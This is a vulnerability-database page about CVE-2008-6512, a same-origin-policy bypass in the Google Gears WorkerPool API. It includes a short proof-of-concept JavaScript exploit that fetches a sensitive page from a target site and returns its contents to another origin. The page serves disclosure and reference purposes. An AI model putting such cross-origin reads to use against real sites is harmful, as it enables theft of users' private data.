Lucene search
K

Google Gears WorkerPool API绕过同源策略漏洞

🗓️ 25 Mar 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 32 Views

Google Gears WorkerPool API bypasses same-origin policy vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-6512
24 Mar 200914:00
cve
Cvelist
CVE-2008-6512
24 Mar 200914:00
cvelist
EUVD
EUVD-2008-6479
7 Oct 202500:30
euvd
NVD
CVE-2008-6512
24 Mar 200914:30
nvd
Prion
Cross site scripting
24 Mar 200914:30
prion

                                                var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
  var request = google.gears.factory.create(\'beta.httprequest\');

  request.open(\'GET\', \'http://TARGET.SITE/SENSITIVE_PAGE.htm\');
   request.onreadystatechange = function() {
     if (request.readyState == 4) {
     wp.sendMessage(\"The response was: \" +
     request.responseText, message.sender);
     }
   };
request.send();
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2009 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00477
32